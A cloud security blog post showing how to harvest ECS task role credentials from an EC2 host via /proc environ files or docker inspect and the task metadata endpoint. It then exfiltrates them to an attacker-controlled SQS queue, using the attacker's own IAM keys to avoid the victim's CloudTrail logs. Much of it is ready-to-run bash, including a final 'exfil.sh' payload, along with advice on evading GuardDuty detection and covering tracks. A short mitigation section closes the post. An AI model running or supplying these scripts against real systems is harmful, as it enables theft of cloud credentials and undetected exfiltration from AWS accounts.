A Fresh Perspective on Exfiltrating ECS Task Metadata Credentials

Introduction

In the cloud-native landscape, Amazon ECS (Elastic Container Service) has become a popular choice for deploying and managing containerised applications at scale. However, with the convenience of ECS comes potential security vulnerabilities that can be exploited if not properly understood and secured. One such vulnerability revolves around the default settings of an EC2 Instance and IAM Task Roles assigned to ECS tasks and how attackers can potentially exploit these roles to gain unauthorized access to sensitive AWS resources.

This blog will deep dive into a specific attack vector targeting ECS Task Metadata Service (TMDS) credentials. We will explore how an attacker with access to the host EC2 instance can extract these credentials and exfiltrate them to an external, attacker-controlled environment.

Attack Objective

The main goal of this attack is to compromise IAM Credentials for all the IAM Task Roles assigned to all the running ECS Services, Tasks and Scheduled Tasks on an EC2 Instance. This technique can be potentially be used to dump all the environment variables as well, which might container IAM Access Keys and Secret Keys, or Sensitive API Keys that are required for an application to run. In this blog we will only be covering how to exfiltrate "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"

Understanding ECS and IAM Task Roles: We'll start with an overview of how ECS works, particularly focusing on how IAM Task Roles are used to grant permissions to containers running within ECS tasks.
Exploiting the Task Metadata Service: We’ll demonstrate how an attacker can leverage the /proc filesystem on the host to extract environment variables, including the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI, which is critical for accessing IAM credentials.
Credential Exfiltration Techniques: With the credentials in hand, we’ll explore different methods for exfiltrating these credentials to an attacker-controlled environment, such as sending them to an SQS queue in the attacker’s AWS account.
Mitigation Strategies: Finally, we’ll discuss proactive measures and best practices to mitigate these risks, ensuring your ECS workloads remain secure.

By the end of this blog, you'll have a clear understanding of the potential risks associated with ECS Task Metadata Service and practical steps to protect your cloud infrastructure from such exploits.

Pre-Requisites

For testing out the following hypothesis, the following scenarios are to be kept in mind

You need to have access to EC2 Instance, either via
- SSH - Public Key or Password Auth
- ssm:StartSession - If you can directly connect to EC2 Instance via SSM Fleet Manager
- ssm:SendCommand, ssm:StartAutomationExecution - This can be used with SSM Documents, where an attacker can craft malicious SSM Document and run it on the target EC2 Instance
- EC2 Instance Connect
- EC2 Serial Console
In this blog, we are going to use standard deployment mode for ECS, in which
- EC2 based on Infrastructure running on Amazon Linux 2
- linux users with standard sudo/docker access - ec2-user, ssm-user; Though we'll explore another method without sudo access ;)

How does ECS work and fetch Task Metadata Service Credentials

Whenever we want to run a containerised task, or a microservice, organizations usually utilise AWS Managed Service - ECS(Elastic Container Service). ECS is responsible for orchestrating and managing containerised applications across a cluster which can either be on EC2 or AWS Fargate.

ECS internally uses ECS-Agent on each EC2 instance which runs as a sidecar on the ECS cluster and helps in handling communication between EC2 instance and ECS Control Plane also known as Amazon Container Service(ACS), this agent is responsible for sharing critical information related to running a task like,

Cluster ARN
Task ID
IAM Task Role
Task Metadata

Let's understand how containers work?

Before we deep dive into the attack methodology, I would like to quickly walk you all through some basics on how Containers work. Whenever a container is running on a host, this container is usually identified on the host as running process within the same PID namespace.

So assuming there is a running container on my system, if I simply just do ps -eF --forest

You can notice that there is a container that is running nginx with a PID of 3249575, you can also get the same information if you use docker inspect -f "{{.State.Pid}}" {containerID}"

Now that we have the PID of the running Container, let's quickly understand the use case of /proc filesystem as well.

The /proc filesystem is a virtual filesystem that provides an interface to kernel data structures. It doesn't contain real files but rather runtime system information (e.g., processes, memory, mounted devices), each running process, including those inside containers, has a corresponding directory under /proc with the name of its PID. This directory contains various files that provide detailed information about the process.

Going by the book, it essentially means, if you have the right set of privileges on your current linux user, you can potentially read /root, /home, /proc directories of the running containers directly from the host.

Navigating to /proc/3249575/ directory on my host, I can see all the relevant information related to this container, for example, I can check Namespaces for the running container

Now interesting thing here is that we can also read environment variables of a running ECS Task, for example, if I am running an ECS Task, ECS Agent is usually running as a sidecar in the cluster. So let's read ENVIRON File for ECS Agent.

Understanding Task Metadata Service

Though reading env variables is not that big hassle, and is quite straightforward, you can get the same data using docker inspect -f "{{.Config.Env}}" {containerID} but the catch lies on how IMDS is utilised with ECS.

ECS utilises a different IMDS than what we are usually aware of i.e http://169.254.169.254/ and is also known as Task Metadata Service(TMDS). You can read more about TMDS here.

A TL;DR for TMDS would be, when you create ECS tasks, you can assign Task Roles(IAM Role) to that task so that it is able to interact with AWS Resources like S3, DynamoDB etc. This Endpoint is stored under the ENV Variables(AWS_CONTAINER_CREDENTIALS_RELATIVE_URI) of a running task, and is always constant. A typical value of this variable would be something like

AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/ec11111d-1af2-1337-8e3a-2137f1111555

Hence a typical way for AWS SDKs to authenticate to AWS would be via the following endpoint.

curl --silent http://169.254.170.2$AWS_CONTAINER_CREDENTIAL_RELATIVE_URI

which would grant STS credentials to the running application on that task.

Weaponising ENV Variables and standard access to host

We explored two different methods to read environment variables from running containers:

Using sudo cat /proc/{PID}/environ
Using docker inspect {containerID} | jq '.[0].Config.Env'

But what if, as an attacker, I write a simple bash script to enumerate all running containers and extract environment variables from each one?

#! /bin/bash

for container in $(docker ps -q); do
    echo "[+]Container: $container"
    pid=$(docker inspect -f "{{.State.Pid}}" $container)
    sudo sh -c "tr '\0' '\n' < /proc/$pid/environ | grep 'AWS_CONTAINER_CREDENTIALS_RELATIVE_URI' | cut -d'=' -f2 | xargs -I {} curl http://169.254.170.2{} --silent | jq ."
    echo ""
done

If you notice, we're running this script with sudo access, which is granted by default to the ec2-user on EC2 instances. This script is executed directly on the host, without running any commands inside the containers themselves.

Quoting what AWS Documentation says about standard "SUDO" access

By default, password authentication and root login are disabled, and sudo is enabled. To log in to your instance, you must use a key pair.

According to AWS documentation, sudo access is enabled by default for ec2-user, with password authentication and root login disabled. To log in to your instance, you must use a key pair. This design allows users to easily log in and troubleshoot the instance, but it also means that sudo access is typically granted without giving you the option to restrict it for the ec2-user or other Linux users. While this can be seen as a design limitation, it is not necessarily a security concern if you properly manage your Linux users and instance configurations.

You might use this script if you suspect that docker CLI commands are being monitored by an Endpoint Detection and Response (EDR) or runtime monitoring tool on the EC2 instance—something that is common in many environments. For example, AWS GuardDuty Runtime Monitoring would typically detect commands like docker inspect or docker exec.

However, if you are willing to take the risk of detection or if you don't have sudo access but your current user does have docker access, you can use an alternative version of this script that bypasses the need for sudo altogether.

#! /bin/bash

for container in $(docker ps -q); 
do
    echo "[+]Container: $container";
    docker inspect $container | jq '.[0].Config.Env' | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d"=" -f2 | tr -d '"' | sed 's/\,//g' | xargs -I {} curl http://169.254.170.2{} --silent | jq .; 
done

Data Exfiltration - Covering tracks via cloud

Now that we have credentials, how can we effectively exfiltrate them to an attacker-controlled environment? Here are a few methods to consider:

Base64 Encode and Send to a C2 Server: While this is a common method, using a Command and Control (C2) server is risky. C2 servers are often flagged by security systems, which could jeopardise the entire operation.
Base64 Encode and Send to an SQS Queue: Sending the encoded payload to an attacker-controlled SQS queue is another option. However, if the EC2 instance profile lacks sqs:SendMessage permissions, the attempt will fail, resulting in an access denied entry in CloudTrail, increasing the likelihood of detection.
Base64 Encode and Use Attacker-Controlled IAM Credentials: This approach involves encoding the payload and using IAM credentials from the attacker's environment to send the data. This method deserves a deeper discussion as it minimizes the risk of detection by avoiding access denied errors in the victim's CloudTrail.

If we create an IAM user in the attacker's controlled AWS environment and grant that user permission to sqs:SendMessage to an attacker-controlled SQS queue, all the related API activity—whether it’s sending messages or encountering access denied errors—would be logged in the attacker's environment, not the victim's. This approach provides several advantages for data exfiltration:

CloudTrail Analysis: The victim's CloudTrail will not log any sqs:SendMessage activities, making it difficult for the victim to detect the exfiltration.
Access Denied Logs: Any access denied errors would be recorded in the attacker's CloudTrail, not the victim's, further reducing the chances of detection on the victim's side.
Legitimate-Looking Traffic: Communication between the victim's environment and the attacker's environment would occur over SQS, which might appear as legitimate traffic, making it less likely to be flagged as suspicious.

By using this method, an attacker can exfiltrate data without triggering alarms in the victim's AWS account, and then safely purge the IAM access keys from the victim’s environment to cover their tracks.

Create SQS Queue in Attacker-Controlled Environment:
Use the following AWS CLI command to create an SQS queue

aws sqs create-queue --queue-name {queueName}

Set Up AWS Lambda with Required Permissions:
To allow the Lambda function to interact with SQS, ensure it has the following permissions:

{
            "Effect": "Allow",
            "Action": [
                "sqs:ReceiveMessage",
                "sqs:DeleteMessage",
                "sqs:GetQueueAttributes"
            ],
            "Resource": "{queueARN}"
}

Use This Code to Base64 Decode Incoming Messages in AWS Lambda, and attach SQS as a trigger for this function.

import json
import base64 

def lambda_handler(event, context):
    for record in event['Records']:
        # Extract the base64 encoded message from the SQS message body
        encoded_message = record['body']
 
        # Decode the base64 encoded message
        decoded_message = base64.b64decode(encoded_message).decode('utf-8')
        
        # Print the clean text
        print("Decoded message:", decoded_message)

Create an IAM User with Specific Permissions:
Create an IAM user and generate IAM Access Key and Secret Key for this user with the following permissions, which will be used to authenticate in the victim's environment:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "sqs:SendMessage",
            "Resource": "arn:aws:sqs:{region}:{accountID}:{queueName}"
        }
    ]
}

Attacker-Controlled Environment Setup Summary:

SQS Queue: A queue is created to receive exfiltrated data.
IAM User: An IAM user with access keys is created with the necessary permissions to send messages to the SQS queue.
Lambda Function: A Lambda function is deployed to poll the SQS queue, decode incoming messages, and potentially store the data in S3 or DynamoDB for further analysis.

Final Payload

Before you copy the code and run it, let's first discuss what's happening in this script. Notice that we need to provide an IAM Access Key, Secret Key, Region, and SQS Queue URL—all of which are controlled by the attacker.

In this script, the IAM credentials are exported to the environment variables of the running EC2 instance. These environment variables take precedence over the instance profile when using the AWS CLI or SDK, allowing the script to operate under the attacker's IAM credentials.

After the exfiltration process is completed, the script simply removes these credentials from the environment variables to clean up any traces.

#!/bin/bash

# Usage: ./exfil.sh <access_key> <secret_key> <region> <sqs_queue_url>


ACCESS_KEY="$1"
SECRET_KEY="$2"
REGION="$3"
SQS_QUEUE_URL="$4"

# Validate that all arguments are provided
if [ -z "$ACCESS_KEY" ] || [ -z "$SECRET_KEY" ] || [ -z "$REGION" ] || [ -z "$SQS_QUEUE_URL" ]; then
    echo "Usage: $0 <access_key> <secret_key> <region> <sqs_queue_url>"
    exit 1
fi

# Set up AWS CLI with the provided access keys
export AWS_ACCESS_KEY_ID="$ACCESS_KEY"
export AWS_SECRET_ACCESS_KEY="$SECRET_KEY"
export AWS_DEFAULT_REGION="$REGION"

# Enumerate Docker containers and extract credentials
for container in $(docker ps -q); do
    echo "[+]Container: $container"
    pid=$(docker inspect -f "{{.State.Pid}}" $container)

    # Extract the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI and fetch credentials
    credentials=$(sudo sh -c "tr '\0' '\n' < /proc/$pid/environ | grep 'AWS_CONTAINER_CREDENTIALS_RELATIVE_URI' | cut -d'=' -f2 | xargs -I {} curl http://169.254.170.2{} --silent | jq .")
    
    # Check if credentials were found
    if [ -n "$credentials" ]; then
        # Base64 encode the credentials
        encoded_credentials=$(echo "$credentials" | base64 -w 0)
        # Send the encoded credentials to the SQS queue
        aws sqs send-message --queue-url "$SQS_QUEUE_URL" --message-body "$encoded_credentials"
        if [ $? -eq 0 ]; then
            echo "Credentials for container $container successfully sent to SQS queue."
        else
            echo "Failed to send credentials for container $container to SQS queue."
        fi
    else
        echo "No AWS credentials found for container $container."
    fi
    echo ""
done

# Unset AWS credentials to avoid leaving them in the environment
unset AWS_ACCESS_KEY_ID
unset AWS_SECRET_ACCESS_KEY
unset AWS_DEFAULT_REGION

Mitigation and Detection

Though we have demonstrated how to perform data exfiltration and also abuse generic ECS behaviour, but how do we securely configure our ECS Infrastructure.

Restrict IAM Permissions for ECS Task Roles
- Least Privilege Principle: Ensure that ECS Task Roles have the minimum necessary permissions required to perform their tasks. Avoid assigning broad permissions like AdministratorAccess to ECS Task Roles. Instead, use fine-grained policies that limit access to only the required AWS services and resources.
- IAM Condition Keys: Leverage IAM condition keys to restrict the use of credentials, such as limiting actions based on source IP addresses, VPC ID etc. This can prevent stolen credentials from being used outside the intended context.
Enable GuardDuty Runtime Monitoring: AWS GuardDuty's Runtime Monitoring for ECS is a powerful tool for detecting suspicious activity. Enable this feature to monitor for potentially malicious actions, such as running unauthorized commands within containers or accessing sensitive credentials. Use GuardDuty findings as part of your incident response process to quickly isolate and investigate compromised containers.
Remove or Restrict Sudo Access: The ability to execute commands with sudo can be a significant risk, as demonstrated in the attack scenario. Restrict sudo access to only those users who absolutely need it and consider using IAM roles with strict permissions instead. Implement IAM policies that limit the use of ssm:StartSession, ssm:SendCommand, and ssm:StartAutomationExecution to trusted users and automate the process of auditing these permissions regularly.
Immutable Infrastructure Practices: Adopt an immutable infrastructure approach where EC2 instances are not accessed or modified after deployment. Any instance requiring changes should be redeployed from a new image rather than updated in place. This limits the exposure time for potential security breaches.

Notes

We discussed the fundamentals of how containers operate and their interaction with the host system. While Amazon ECS enables organizations to efficiently scale their infrastructure and manage operational tasks, it's crucial to understand how ECS functions internally. Awareness of how default settings on ECS and EC2 instances can be exploited to potentially exfiltrate and misuse IAM credentials is essential. If you've made it this far and you're impressed with CRED's security ecosystem and research on AWS Infrastructure, we'd love to hear from you! We're hiring!

Saransh Rana

Team Lead - Cloud Security@CRED

PreviousMaintaining persistence via Shared sessions on Cloud Workstations

Last updated 11 months ago